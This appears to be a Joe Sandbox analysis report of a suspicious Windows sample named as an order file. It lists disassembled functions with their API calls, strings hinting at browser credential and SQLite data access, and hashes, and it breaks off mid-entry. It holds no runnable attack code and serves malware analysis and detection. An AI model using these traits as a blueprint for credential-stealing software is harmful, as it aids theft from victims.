                                        Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                        • Sleep.KERNEL32(00000001), ref: 004178E9
                                        • GetLastError.KERNEL32 ref: 004178FB
                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$ErrorLastLockSleepUnlock
                                        • String ID:
                                        • API String ID: 3015003838-0
                                        • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                        • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                        • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                        • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                        Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00407E44
                                        • memset.MSVCRT ref: 00407E5B
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                        • wcscpy.MSVCRT ref: 00407F10
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                        • String ID:
                                        • API String ID: 59245283-0
                                        • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                        • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                        • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                        • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                        Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                        • GetLastError.KERNEL32 ref: 0041855C
                                        • Sleep.KERNEL32(00000064), ref: 00418571
                                        • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                        • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                        • GetLastError.KERNEL32 ref: 0041858E
                                        • Sleep.KERNEL32(00000064), ref: 004185A3
                                        • free.MSVCRT ref: 004185AC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$AttributesDeleteErrorLastSleep$free
                                        • String ID:
                                        • API String ID: 2802642348-0
                                        • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                        • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                        • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                        • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                        Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                        • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                        • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                        • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                        • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                        • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                        Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                        • memset.MSVCRT ref: 00413ADC
                                        • memset.MSVCRT ref: 00413AEC
                                          • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                        • memset.MSVCRT ref: 00413BD7
                                        • wcscpy.MSVCRT ref: 00413BF8
                                        • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                        • String ID: 3A
                                        • API String ID: 3300951397-293699754
                                        • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                        • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                        • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                        • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                        Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                        • wcscpy.MSVCRT ref: 0040D1B5
                                          • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                          • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                        • wcslen.MSVCRT ref: 0040D1D3
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                        • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                        • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                        • String ID: strings
                                        • API String ID: 3166385802-3030018805
                                        • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                        • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                        • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                        • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                        Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00411AF6
                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                        • wcsrchr.MSVCRT ref: 00411B14
                                        • wcscat.MSVCRT ref: 00411B2E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                        • String ID: AE$.cfg$General$EA
                                        • API String ID: 776488737-1622828088
                                        • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                        • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                        • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                        • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                        Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040D8BD
                                        • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                        • memset.MSVCRT ref: 0040D906
                                        • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                        • _wcsicmp.MSVCRT ref: 0040D92F
                                          • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                          • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                        • String ID: sysdatetimepick32
                                        • API String ID: 1028950076-4169760276
                                        • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                        • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                        • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                        • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                        Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                        • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                        • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                        • memset.MSVCRT ref: 0041BA3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID: -journal$-wal
                                        • API String ID: 438689982-2894717839
                                        • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                        • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                        • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                        • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                        Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                        • EndDialog.USER32(?,00000002), ref: 00405C83
                                        • EndDialog.USER32(?,00000001), ref: 00405C98
                                          • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                          • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Item$Dialog$MessageSend
                                        • String ID:
                                        • API String ID: 3975816621-0
                                        • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                        • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                        • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                        • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                        Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 00444D09
                                        • _wcsicmp.MSVCRT ref: 00444D1E
                                        • _wcsicmp.MSVCRT ref: 00444D33
                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$wcslen$_memicmp
                                        • String ID: .save$http://$https://$log profile$signIn
                                        • API String ID: 1214746602-2708368587
                                        • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                        • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                        • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                        • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                        Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                        • memset.MSVCRT ref: 00405E33
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                        • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                        • String ID:
                                        • API String ID: 2313361498-0
                                        • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                        • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                        • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                        • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                        Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00405F65
                                        • GetWindow.USER32(?,00000005), ref: 00405F7D
                                        • GetWindow.USER32(00000000), ref: 00405F80
                                          • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                        • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                        • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                        • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageRectSend$Client
                                        • String ID:
                                        • API String ID: 2047574939-0
                                        • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                        • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                        • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                        • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                        Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00418836
                                        • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                        • GetCurrentProcessId.KERNEL32 ref: 00418856
                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                        • GetTickCount.KERNEL32 ref: 0041887D
                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                        • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                        • String ID:
                                        • API String ID: 4218492932-0
                                        • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                        • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                        • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                        • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                        Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                        • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID: gj
                                        • API String ID: 438689982-4203073231
                                        • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                        • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                        • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                        • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                        Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                        Strings
                                        Memory Dump Source
